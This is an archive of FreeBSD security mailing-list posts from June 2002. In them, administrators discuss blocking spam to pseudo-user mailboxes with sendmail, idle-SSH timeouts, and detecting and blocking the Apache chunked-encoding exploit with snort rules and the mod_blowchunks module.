From owner-freebsd-security Sun Jun 23 2:16:30 2002 Delivered-To: freebsd-security@freebsd.org Received: from smtp.noos.fr (lafontaine.noos.net [212.198.2.72]) by hub.freebsd.org (Postfix) with ESMTP id D98CB37B400 for ; Sun, 23 Jun 2002 02:16:22 -0700 (PDT) Received: (qmail 4766222 invoked by uid 0); 23 Jun 2002 09:16:21 -0000 Received: from unknown (HELO gits.gits.dyndns.org) ([212.198.229.153]) (envelope-sender ) by 212.198.2.72 (qmail-ldap-1.03) with SMTP for ; 23 Jun 2002 09:16:21 -0000 Received: from gits.gits.dyndns.org (9qmcpy01o87ydll3@localhost [127.0.0.1]) by gits.gits.dyndns.org (8.12.3/8.12.3) with ESMTP id g5N9GKAb096005; Sun, 23 Jun 2002 11:16:20 +0200 (CEST) (envelope-from root@gits.dyndns.org) Received: (from root@localhost) by gits.gits.dyndns.org (8.12.4/8.12.3/Submit) id g5N9GK92096004; Sun, 23 Jun 2002 11:16:20 +0200 (CEST) (envelope-from root) Date: Sun, 23 Jun 2002 11:16:20 +0200 From: Cyrille Lefevre To: Gregory Neil Shapiro Cc: security@FreeBSD.ORG Subject: Re: Possible security liability: Filling disks with junk or spam Message-ID: <20020623091620.GB95941@gits.dyndns.org> References: <3D13FFB2.39A80570@pantherdragon.org> <200206221716.g5MHGmJZ082170@orthanc.ab.ca> <20020623015353.GB14530@gits.dyndns.org> <15637.11607.813966.761277@horsey.gshapiro.net> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline In-Reply-To: <15637.11607.813966.761277@horsey.gshapiro.net> User-Agent: Mutt/1.3.99i Organization: ACME X-Face: V|+c;4!|B?E%BE^{E6);aI.[< List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org On Sat, Jun 22, 2002 at 07:07:19PM -0700, Gregory Neil Shapiro wrote: > cyrille.lefevre> the access seems to be only for domains, not users... > > It can be used for usernames and complete addresses as well. However, for > blocking incoming addresses, you need: > > FEATURE(`blacklist_recipients') > Turns on the ability to block incoming mail for certain > recipient usernames, hostnames, or addresses. For > example, you can block incoming mail to user nobody, > host foo.mydomain.com, or guest@bar.mydomain.com. > These specifications are put in the access db as > described in the anti-spam configuration control section > later in this document. ok, so, we should have both features access_db and blacklist_recipients to block delivery to local users. not seen that before. thanks. Cyrille. -- Cyrille Lefevre mailto:cyrille.lefevre@laposte.net To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Sun Jun 23 3:43:36 2002 Delivered-To: freebsd-security@freebsd.org Received: from favour.one2net.co.ug (g-class.sanyutel.com [216.250.215.27]) by hub.freebsd.org (Postfix) with ESMTP id 42F1F37B400 for ; Sun, 23 Jun 2002 03:43:31 -0700 (PDT) Received: from localhost (localhost.one2net.co.ug [127.0.0.1]) by favour.one2net.co.ug (Postfix) with ESMTP id A6F2154833; Sun, 23 Jun 2002 13:42:51 +0300 (EAT) Date: Sun, 23 Jun 2002 13:42:51 +0300 (EAT) From: Noah K Sematimba X-X-Sender: ksemat@favour.one2net.co.ug To: Dan Pelleg Cc: Lawrence Sica , twig les , Subject: Re: SSH timeout settings In-Reply-To: Message-ID: <20020623134155.M69114-100000@favour.one2net.co.ug> MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org > The are at least two ports (blimitd and idled) that claim to enforce this > limit - I've tried neither. idled actually does this very well. Noah. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Sun Jun 23 6:23:17 2002 Delivered-To: freebsd-security@freebsd.org Received: from pa169.kurdwanowa.sdi.tpnet.pl (pa169.kurdwanowa.sdi.tpnet.pl [213.77.148.169]) by hub.freebsd.org (Postfix) with ESMTP id C3CB337B403 for ; Sun, 23 Jun 2002 06:23:09 -0700 (PDT) Received: from velvet.zaraska.dhs.org (velvet.zaraska.dhs.org [192.168.11.2]) by pa169.kurdwanowa.sdi.tpnet.pl (Postfix) with SMTP id 4211F1E3D; Sun, 23 Jun 2002 13:23:07 +0000 (GMT) Date: Sun, 23 Jun 2002 15:23:21 +0200 From: Krzysztof Zaraska To: "jps@funeralexchange.com" Cc: freebsd-security@FreeBSD.ORG Subject: Re: Apache FreeBSD exploit released Message-Id: <20020623152321.17da5967.kzaraska@student.uci.agh.edu.pl> In-Reply-To: <3177.66.171.47.179.1024786088.squirrel@webmail.allneo.com> References: <20020622125713.547c2546.kzaraska@student.uci.agh.edu.pl> <3177.66.171.47.179.1024786088.squirrel@webmail.allneo.com> X-Mailer: Sylpheed version 0.7.3 (GTK+ 1.2.10; i386-redhat-linux) Mime-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org On Sat, 22 Jun 2002 17:48:08 -0500 (CDT) "jps@funeralexchange.com" wrote: > The only way to trace the attacker i have found so far is to do a > netstat during the attack and you will see the requests coming in on the > requested port (80 by default). > Anyone know of any ports or tools i could use on my servers to watch out > for something like this?. A network IDS capable of detecting the attack will show you where it comes from. If you happen to run some sort of NIDS: - snort rules for the attack are available from http://www.snort.org/article.html?id=108 . They are based on detecting "Transfer-Encoding: chunked" header, so make sure they will not trigger when your server _sends_ this header (that means you should have $EXTERNAL_NET and $HTTP_SERVERS set correctly). The exploit is based on using this encoding scheme in HTTP request send _to_ the server, what is normally not used. The rule is relatively simple, so there should be no problem with writing it in any other format. - NIDS with (polymorphic) shellcode detection should detect it. I have tested that with shellcode detector in Prelude yesterday, it was detecting the attack. I guess other IDS products having similar capabilities should work fine as well, but I wasn't able to test. Despite of detection method I was getting a flood of alerts when firing the exploit, so it should be hard to miss. -- // Krzysztof Zaraska * kzaraska (at) student.uci.agh.edu.pl // Prelude IDS: http://www.prelude-ids.org/ // A dream will always triumph over reality, once it is given the chance. // -- Stanislaw Lem To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Sun Jun 23 6:36:12 2002 Delivered-To: freebsd-security@freebsd.org Received: from proxy.centtech.com (moat.centtech.com [206.196.95.10]) by hub.freebsd.org (Postfix) with ESMTP id A16F137B40E for ; Sun, 23 Jun 2002 06:35:50 -0700 (PDT) Received: from sprint.centtech.com (sprint.centtech.com [10.177.173.31]) by proxy.centtech.com (8.11.6/8.11.6) with ESMTP id g5NDZV100590; Sun, 23 Jun 2002 08:35:31 -0500 (CDT) Received: (from root@localhost) by sprint.centtech.com (8.11.6+Sun/8.11.6) id g5NDZV816368; Sun, 23 Jun 2002 08:35:31 -0500 (CDT) Received: from centtech.com (andersonpc [192.168.42.18]) by sprint.centtech.com (8.11.6+Sun/8.11.6) with ESMTP id g5NDZHR16360; Sun, 23 Jun 2002 08:35:17 -0500 (CDT) Message-ID: <3D15CEE9.D0CD86C7@centtech.com> Date: Sun, 23 Jun 2002 08:36:41 -0500 From: Eric Anderson X-Mailer: Mozilla 4.76 [en] (X11; U; FreeBSD 4.3-RELEASE i386) X-Accept-Language: en MIME-Version: 1.0 To: Cyrille Lefevre Cc: Lyndon Nerenberg , Darren Pilgrim , "Kevin Kinsey, DaleCo, S.P." , Mark Hartley , twig les , security@freebsd.org Subject: Re: Possible security liability: Filling disks with junk or spam References: <3D13FFB2.39A80570@pantherdragon.org> <200206221716.g5MHGmJZ082170@orthanc.ab.ca> <20020623015353.GB14530@gits.dyndns.org> Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit X-Virus-Scanned: by AMaViS perl-11 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Actually, the access table works great for FROM: and TO: addresses, as long as you use those tags in the access list. I do this when employees leave the company, so mail stops coming in for those people. Eric Cyrille Lefevre wrote: > > Such as a REJECT entry in /etc/mail/access? > > the access seems to be only for domains, not users... > > the virtusertable would be a good choice for that : > > bin@domain error:5.1.1:550 User unknown > > too bad there is no xxxtable to handle such cases like : > > bin REJECT > To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Sun Jun 23 10:45:30 2002 Delivered-To: freebsd-security@freebsd.org Received: from lariat.org (lariat.org [63.229.157.2]) by hub.freebsd.org (Postfix) with ESMTP id 0B7D837B414; Sun, 23 Jun 2002 10:45:22 -0700 (PDT) Received: (from root@localhost) by lariat.org (8.9.3/8.9.3) id LAA13505; Sun, 23 Jun 2002 11:45:13 -0600 (MDT) Date: Sun, 23 Jun 2002 11:45:13 -0600 (MDT) From: Brett Glass Message-Id: <200206231745.LAA13505@lariat.org> To: anders@FreeBSD.ORG, marius@marius.org Subject: Re: Apache FreeBSD exploit released Cc: freebsd-security@FreeBSD.ORG, jps@funeralexchange.com, kzaraska@student.uci.agh.edu.pl In-Reply-To: <20020623013300.GB35692@marius.org> Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Does mod_blowchunks work with Apache 2.x? Or only 1.3.x? --Brett To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Sun Jun 23 10:51:16 2002 Delivered-To: freebsd-security@freebsd.org Received: from totem.fix.no (totem.fix.no [80.91.32.29]) by hub.freebsd.org (Postfix) with ESMTP id BE46537B403 for ; Sun, 23 Jun 2002 10:51:11 -0700 (PDT) Received: by totem.fix.no (Postfix, from userid 1000) id ED92A202D4; Sun, 23 Jun 2002 19:51:27 +0200 (CEST) Date: Sun, 23 Jun 2002 19:51:27 +0200 From: Anders Nordby To: Brett Glass Cc: marius@marius.org, freebsd-security@FreeBSD.ORG, jps@funeralexchange.com, kzaraska@student.uci.agh.edu.pl Subject: Re: Apache FreeBSD exploit released Message-ID: <20020623175127.GA85308@totem.fix.no> References: <20020623013300.GB35692@marius.org> <200206231745.LAA13505@lariat.org> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline In-Reply-To: <200206231745.LAA13505@lariat.org> User-Agent: Mutt/1.3.99i X-PGP-Key: http://anders.fix.no/pgp/ X-PGP-Key-FingerPrint: 1E0F C53C D8DF 6A8F EAAD 19C5 D12A BC9F 0083 5956 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Hello, On Sun, Jun 23, 2002 at 11:45:13AM -0600, Brett Glass wrote: > Does mod_blowchunks work with Apache 2.x? Or only 1.3.x? I've only tried it with Apache 1.3.x. You're welcome to test with Apache 2 and possibly supply patches for Apache 2 support if we would need that. Cheers, -- Anders. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Sun Jun 23 13:35:49 2002 Delivered-To: freebsd-security@freebsd.org Received: from vinyl2.sentex.ca (vinyl2.sentex.ca [199.212.134.13]) by hub.freebsd.org (Postfix) with ESMTP id F172C37B400 for ; Sun, 23 Jun 2002 13:35:37 -0700 (PDT) Received: from house.sentex.net (cage.simianscience.com [64.7.134.1]) (authenticated bits=0) by vinyl2.sentex.ca (8.12.3/8.12.2) with ESMTP id g5NKZYdc003880; Sun, 23 Jun 2002 16:35:35 -0400 (EDT) (envelope-from mike@sentex.net) Message-Id: <5.1.0.14.0.20020623163303.071f8890@192.168.0.12> X-Sender: mdtancsa@192.168.0.12 X-Mailer: QUALCOMM Windows Eudora Version 5.1 Date: Sun, 23 Jun 2002 16:33:51 -0400 To: Marius Strom From: Mike Tancsa Subject: Re: Apache FreeBSD exploit released Cc: freebsd-security@FreeBSD.ORG In-Reply-To: <20020623013300.GB35692@marius.org> References: <20020622225822.GA65796@totem.fix.no> <20020622125713.547c2546.kzaraska@student.uci.agh.edu.pl> <3177.66.171.47.179.1024786088.squirrel@webmail.allneo.com> <20020622225822.GA65796@totem.fix.no> Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii"; format=flowed Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org What does it looks like in the logs on a patched version of apache ? ---Mike At 08:33 PM 6/22/2002 -0500, Marius Strom wrote: >fwiw, i've tested mod_blowchunks and it seems to work pretty well. >ymmv. i wasn't able to exploit before installing it, so I have no >guaranteed proof that it works (however, it doesn't seem to break >anything we've got going either.) > >On Sun, 23 Jun 2002, Anders Nordby wrote: > > Hello, > > > > On Sat, Jun 22, 2002 at 05:48:08PM -0500, jps@funeralexchange.com wrote: > > > I have been trying to crack two of my FreeBSD boxes for the past 12 hours > > > with not luck so far. > > > # 1 Server > > > apache+mod_ssl-1.3.23+2.8.7 > > > 4.6-RC FreeBSD 4.6-RC #2: Tue Jun 4 23:33:52 CDT 2002 > > > > > > # 2 Server > > > apache+mod_ssl-1.3.17+2.8.0 > > > 4.5-STABLE FreeBSD 4.5-STABLE #1: Sun Apr 21 05:43:49 GMT 2002 > > > > I've been giving apache-nosejob.c a go too (on 4.5-RELEASE with Apache > > 1.3.23, which is no its target list) for some hours, no success except > > lots of httpds exiting on signal 11. > > > > > Segmentation fault (11) > > > The only way to trace the attacker i have found so far is to do a netstat > > > during the attack and you will see the requests coming in on the > requested > > > port (80 by default). > > > Anyone know of any ports or tools i could use on my servers to watch out > > > for something like this?. I have already upgraded all my production > > > servers to the latest versions to protect them but i still would like to > > > have something like this in place just to be on the safe side. > > > > I just committed ports/www/mod_blowchunks, which you can use to reject > > and log chunked requests. > > > > Cheers, > > > > -- > > Anders. > > > > To Unsubscribe: send mail to majordomo@FreeBSD.org > > with "unsubscribe freebsd-security" in the body of the message > >-- > /-------------------------------------------------> >Marius Strom | Always carry a short length of fibre-optic cable. >Professional Geek | If you get lost, then you can drop it on the >System/Network Admin | ground, wait 10 minutes, and ask the backhoe >http://www.marius.org/ | operator how to get back to civilization. > \-------------| Alan Frame |----------------------> > >To Unsubscribe: send mail to majordomo@FreeBSD.org >with "unsubscribe freebsd-security" in the body of the message -------------------------------------------------------------------- Mike Tancsa, tel +1 519 651 3400 Sentex Communications, mike@sentex.net Providing Internet since 1994 www.sentex.net Cambridge, Ontario Canada www.sentex.net/mike To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Sun Jun 23 14:24:38 2002 Delivered-To: freebsd-security@freebsd.org Received: from mail.gbronline.com (mail.gbronline.com [12.145.226.4]) by hub.freebsd.org (Postfix) with ESMTP id 756FC37B400 for ; Sun, 23 Jun 2002 14:24:31 -0700 (PDT) Received: from daleco [12.145.236.68] by mail.gbronline.com (SMTPD32-7.10) id AC30125F00D8; Sun, 23 Jun 2002 16:22:56 -0500 Message-ID: <008901c21afc$4a836100$44ec910c@daleco> From: "Kevin Kinsey, DaleCo, S.P." To: "Lawrence Sica" , "Trevor Johnson" Cc: References: <20020621210455.F13586-100000@blues.jpj.net> <3D1557A3.4030504@earthlink.net> Subject: Re: Possible security liability: Filling disks with junk or spam Date: Sun, 23 Jun 2002 16:23:57 -0500 MIME-Version: 1.0 Content-Type: text/plain; charset="iso-8859-1" Content-Transfer-Encoding: 7bit X-Priority: 3 X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook Express 6.00.2600.0000 X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2600.0000 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org ----- Original Message ----- From: "Lawrence Sica" To: "Trevor Johnson" Cc: Sent: Sunday, June 23, 2002 12:07 AM Subject: Re: Possible security liability: Filling disks with junk or spam > Trevor Johnson wrote: > >>A client recently called me in puzzlement, saying that his system was > >>misbehaving, and it turned out that this was what had happened. The address > >>"news@victim.com" had somehow wound up on quite a few spammers' lists. He'd > >>never used or hosted netnews, and so had no need for the pseudo-user. But that > >>pseudo-user was there by default, and the system dutifully created a mailbox > >>for him/her/it when the very first spam arrived. It started growing by leaps > >>and bounds until it was -- I kid you not! -- several hundred megabytes in > >>size. At which point the partition ran out of room. > >> > >>It seems to me that pseudo-users should be non-mailable, just as a basic > >>security policy. Ideas for the best way to implement this in the default > >>install? > > > > > > Consider that the daily output includes a df output so you just need to > read your root email ;) > > --Larry > And that's a great point worthy of a reposting. While it's unfortunate that someone got their disk filled with junk, it's also seemingly indicative of a general lack of supervision on that box. The first line of defense is the scrutiny of the operator, not necessarily the revision of the OS. One of the reasons I choose FBSD over other servers, especially M$, is that it's not too hard to do some reading and learn the OS; learn a couple of easy command line statements and see what's installed, what services are running, and etc Patience is a virtue, time with a browser a must, but no rocket science degree is needed. Perhaps this should be added to /stand/sysinstall: "You have just installed an operating system. Before you reboot your computer, PLEASE take some time and learn just what the thing will be doing while it sits in your home and/or place of business...." KDK To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Sun Jun 23 14:36: 8 2002 Delivered-To: freebsd-security@freebsd.org Received: from marius.org (cdm-66-156-207-brcs.cox-internet.com [66.76.156.207]) by hub.freebsd.org (Postfix) with ESMTP id B35C237B405 for ; Sun, 23 Jun 2002 14:36:02 -0700 (PDT) Received: from marius.org (localhost [127.0.0.1]) by marius.org (8.12.3/8.12.3) with ESMTP id g5NLa1rT006007; Sun, 23 Jun 2002 16:36:01 -0500 (CDT) (envelope-from marius@marius.org) Received: (from marius@localhost) by marius.org (8.12.3/8.12.3/Submit) id g5NLa1g3006006; Sun, 23 Jun 2002 16:36:01 -0500 (CDT) Date: Sun, 23 Jun 2002 16:36:01 -0500 From: Marius Strom To: Mike Tancsa Cc: freebsd-security@FreeBSD.ORG Subject: Re: Apache FreeBSD exploit released Message-ID: <20020623213601.GC3015@marius.org> Mail-Followup-To: Mike Tancsa , freebsd-security@FreeBSD.ORG References: <20020622225822.GA65796@totem.fix.no> <20020622125713.547c2546.kzaraska@student.uci.agh.edu.pl> <3177.66.171.47.179.1024786088.squirrel@webmail.allneo.com> <20020622225822.GA65796@totem.fix.no> <5.1.0.14.0.20020623163303.071f8890@192.168.0.12> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline In-Reply-To: <5.1.0.14.0.20020623163303.071f8890@192.168.0.12> User-Agent: Mutt/1.5.1i Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Snippet from my logs: [Sat Jun 22 17:42:47 2002] [error] [client X.X.X.X] Transfer-Encoding: chunked - denied and logged On Sun, 23 Jun 2002, Mike Tancsa wrote: > > What does it looks like in the logs on a patched version of apache ? > > ---Mike > > At 08:33 PM 6/22/2002 -0500, Marius Strom wrote: > >fwiw, i've tested mod_blowchunks and it seems to work pretty well. > >ymmv. i wasn't able to exploit before installing it, so I have no > >guaranteed proof that it works (however, it doesn't seem to break > >anything we've got going either.) > > > >On Sun, 23 Jun 2002, Anders Nordby wrote: > >> Hello, > >> > >> On Sat, Jun 22, 2002 at 05:48:08PM -0500, jps@funeralexchange.com wrote: > >> > I have been trying to crack two of my FreeBSD boxes for the past 12 > >hours > >> > with not luck so far. > >> > # 1 Server > >> > apache+mod_ssl-1.3.23+2.8.7 > >> > 4.6-RC FreeBSD 4.6-RC #2: Tue Jun 4 23:33:52 CDT 2002 > >> > > >> > # 2 Server > >> > apache+mod_ssl-1.3.17+2.8.0 > >> > 4.5-STABLE FreeBSD 4.5-STABLE #1: Sun Apr 21 05:43:49 GMT 2002 > >> > >> I've been giving apache-nosejob.c a go too (on 4.5-RELEASE with Apache > >> 1.3.23, which is no its target list) for some hours, no success except > >> lots of httpds exiting on signal 11. > >> > >> > Segmentation fault (11) > >> > The only way to trace the attacker i have found so far is to do a > >netstat > >> > during the attack and you will see the requests coming in on the > >requested > >> > port (80 by default). > >> > Anyone know of any ports or tools i could use on my servers to watch > >out > >> > for something like this?. I have already upgraded all my production > >> > servers to the latest versions to protect them but i still would like > >to > >> > have something like this in place just to be on the safe side. > >> > >> I just committed ports/www/mod_blowchunks, which you can use to reject > >> and log chunked requests. > >> > >> Cheers, > >> > >> -- > >> Anders. > >> > >> To Unsubscribe: send mail to majordomo@FreeBSD.org > >> with "unsubscribe freebsd-security" in the body of the message > > > >-- > > /-------------------------------------------------> > >Marius Strom | Always carry a short length of fibre-optic cable. > >Professional Geek | If you get lost, then you can drop it on the > >System/Network Admin | ground, wait 10 minutes, and ask the backhoe > >http://www.marius.org/ | operator how to get back to civilization. > > \-------------| Alan Frame |----------------------> > > > >To Unsubscribe: send mail to majordomo@FreeBSD.org > >with "unsubscribe freebsd-security" in the body of the message > > -------------------------------------------------------------------- > Mike Tancsa, tel +1 519 651 3400 > Sentex Communications, mike@sentex.net > Providing Internet since 1994 www.sentex.net > Cambridge, Ontario Canada www.sentex.net/mike > -- /-------------------------------------------------> Marius Strom | Always carry a short length of fibre-optic cable. Professional Geek | If you get lost, then you can drop it on the System/Network Admin | ground, wait 10 minutes, and ask the backhoe http://www.marius.org/ | operator how to get back to civilization. \-------------| Alan Frame |----------------------> To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Sun Jun 23 16:39:51 2002 Delivered-To: freebsd-security@freebsd.org Received: from spqr.osg.gov.bc.ca (spqr.osg.gov.bc.ca [142.32.102.24]) by hub.freebsd.org (Postfix) with ESMTP id EB10A37B403 for ; Sun, 23 Jun 2002 16:39:35 -0700 (PDT) Received: from passer.osg.gov.bc.ca (passer.osg.gov.bc.ca [142.32.110.29]) by spqr.osg.gov.bc.ca (Postfix) with ESMTP id B5A919EF08; Sun, 23 Jun 2002 16:39:35 -0700 (PDT) Received: from cwsys.cwsent.com (cwsys2 [10.1.2.1]) by passer.osg.gov.bc.ca (8.12.4/8.12.3) with ESMTP id g5NNdY5m011917; Sun, 23 Jun 2002 16:39:34 -0700 (PDT) (envelope-from cy@cwsent.com) Received: from cwsys (localhost [127.0.0.1]) by cwsys.cwsent.com (8.12.4/8.12.3) with ESMTP id g5NNdXJw079333; Sun, 23 Jun 2002 16:39:33 -0700 (PDT) (envelope-from cy@cwsys.cwsent.com) Message-Id: <200206232339.g5NNdXJw079333@cwsys.cwsent.com> X-Mailer: exmh version 2.5 07/13/2001 with nmh-1.0.4 Reply-To: Cy Schubert - CITS Open Systems Group From: Cy Schubert - CITS Open Systems Group X-os: FreeBSD X-Sender: cy@cwsent.com To: "Kevin Kinsey, DaleCo, S.P." Cc: "Lawrence Sica" , "Trevor Johnson" , security@FreeBSD.ORG Subject: Re: Possible security liability: Filling disks with junk or spam In-Reply-To: Message from "Kevin Kinsey, DaleCo, S.P." of "Sun, 23 Jun 2002 16:23:57 CDT." <008901c21afc$4a836100$44ec910c@daleco> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Date: Sun, 23 Jun 2002 16:39:33 -0700 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org In message <008901c21afc$4a836100$44ec910c@daleco>, "Kevin Kinsey, DaleCo, S.P. " writes: > ----- Original Message ----- > From: "Lawrence Sica" > To: "Trevor Johnson" > Cc: > Sent: Sunday, June 23, 2002 12:07 AM > Subject: Re: Possible security liability: Filling disks with junk or spam > > > > Trevor Johnson wrote: > > >>A client recently called me in puzzlement, saying that his system was > > >>misbehaving, and it turned out that this was what had happened. The > address > > >>"news@victim.com" had somehow wound up on quite a few spammers' lists. > He'd > > >>never used or hosted netnews, and so had no need for the pseudo-user. > But that > > >>pseudo-user was there by default, and the system dutifully created a > mailbox > > >>for him/her/it when the very first spam arrived. It started growing by > leaps > > >>and bounds until it was -- I kid you not! -- several hundred megabytes > in > > >>size. At which point the partition ran out of room. > > >> > > >>It seems to me that pseudo-users should be non-mailable, just as a basic > > >>security policy. Ideas for the best way to implement this in the default > > >>install? > > > > > > > > > > Consider that the daily output includes a df output so you just need to > > read your root email ;) > > > > --Larry > > > And that's a great point worthy of a reposting. While it's unfortunate that > someone got their disk filled with junk, it's also seemingly indicative of a > general lack of supervision on that box. The first line of defense is the > scrutiny of the operator, not necessarily the revision of the OS. Agreed and scrutiny by the operator should also be the last line of defense. Little do many understand that an experienced sysadmin is the best asset they can have. Unfortunately many companies and organizations are unwilling to pay for that. > > One of the reasons I choose FBSD over other servers, especially M$, is > that it's not too hard to do some reading and learn the OS; learn a couple > of easy command line statements and see what's installed, what services are > running, and etc Patience is a virtue, time with a browser a must, but no > rocket science degree is needed. > > Perhaps this should be added to /stand/sysinstall: > "You have just installed an operating system. Before you reboot > your > computer, PLEASE take some time and learn just what the thing will be > doing while it sits in your home and/or place of business...." Or hire or rent someone with the qualifications and experience to do it right. Of course paying a lot of money doesn't guarantee that the job will be done right. I've seen cases where high priced vendor personnel installed insecure systems stating that the O/S comes secure right out of the box and that no additional security "tweaking" was required. Unfortunately these systems were quickly discovered by spammers. The rest was history. -- Cheers, Phone: 250-387-8437 Cy Schubert Fax: 250-387-5766 Team Leader, Sun/Alpha Team Email: Cy.Schubert@osg.gov.bc.ca Open Systems Group, CITS Ministry of Management Services Province of BC FreeBSD UNIX: cy@FreeBSD.org To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Sun Jun 23 22:23:31 2002 Delivered-To: freebsd-security@freebsd.org Received: from probsd.ws (ilm26-7-034.ec.rr.com [66.26.7.34]) by hub.freebsd.org (Postfix) with ESMTP id DD19D37B400; Sun, 23 Jun 2002 22:23:25 -0700 (PDT) Received: from probsd.ws (probsd.ws [192.168.1.4]) by probsd.ws (8.12.4/8.12.4) with SMTP id g5O5P3Il094383; Mon, 24 Jun 2002 01:25:03 -0400 (EDT) (envelope-from freebsd@ec.rr.com) Received: from 192.168.1.4 (SquirrelMail authenticated user ms) by webmail.probsd.ws with HTTP; Mon, 24 Jun 2002 01:25:03 -0400 (EDT) Message-ID: <1470.192.168.1.4.1024896303.squirrel@webmail.probsd.ws> Date: Mon, 24 Jun 2002 01:25:03 -0400 (EDT) Subject: libparanoia From: "Michael Sharp" To: X-Priority: 3 Importance: Normal X-MSMail-Priority: Normal Cc: X-Mailer: SquirrelMail (version 1.2.7) MIME-Version: 1.0 Content-Type: text/plain; charset=iso-8859-1 Content-Transfer-Encoding: 8bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org I want to utilize libparanoia on my system and just installed the port. However, in reading the pkg-descr, I dont understand how to do this part: -- snip -- you can just install it as a port/package, and then relink critical applications (such as a network daemons) with -lparanoia -L/usr/local/lib , or you can override standard functions in libc (using libparanoia/copy-to-libc shell script) - in this case you'll get any application,which uses shared libc, automatically protected. -- snip -- Can anyone using libparanoia suggest which method ( the shell script method or relinking critical applications ) is the best, and how to go about doing either? Thx, Michael To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon Jun 24 4:59:40 2002 Delivered-To: freebsd-security@freebsd.org Received: from scaup.mail.pas.earthlink.net (scaup.mail.pas.earthlink.net [207.217.120.49]) by hub.freebsd.org (Postfix) with ESMTP id 9E17B37B404 for ; Mon, 24 Jun 2002 04:59:30 -0700 (PDT) Received: from user-2iniujr.dialup.mindspring.com ([165.121.122.123] helo=earthlink.net) by scaup.mail.pas.earthlink.net with esmtp (Exim 3.33 #2) id 17MSUm-0004Iq-00; Mon, 24 Jun 2002 04:59:00 -0700 Message-ID: <3D170984.6010003@earthlink.net> Date: Mon, 24 Jun 2002 04:59:00 -0700 From: Lawrence Sica User-Agent: Mozilla/5.0 (Macintosh; U; PPC Mac OS X; en-US; rv:1.0.0) Gecko/20020529 X-Accept-Language: en-us, en MIME-Version: 1.0 To: Cy Schubert - CITS Open Systems Group Cc: "Kevin Kinsey, DaleCo, S.P." , Trevor Johnson , security@FreeBSD.ORG Subject: Re: Possible security liability: Filling disks with junk or spam References: <200206232339.g5NNdXJw079333@cwsys.cwsent.com> Content-Type: text/plain; charset=us-ascii; format=flowed Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Cy Schubert - CITS Open Systems Group wrote: > In message <008901c21afc$4a836100$44ec910c@daleco>, "Kevin Kinsey, > DaleCo, S.P. > " writes: > >>----- Original Message ----- >>From: "Lawrence Sica" >>To: "Trevor Johnson" >>Cc: >>Sent: Sunday, June 23, 2002 12:07 AM >>Subject: Re: Possible security liability: Filling disks with junk or spam >> >> >> >>>Trevor Johnson wrote: >>> >>>>>A client recently called me in puzzlement, saying that his system was >>>>>misbehaving, and it turned out that this was what had happened. The >>>> >>address >> >>>>>"news@victim.com" had somehow wound up on quite a few 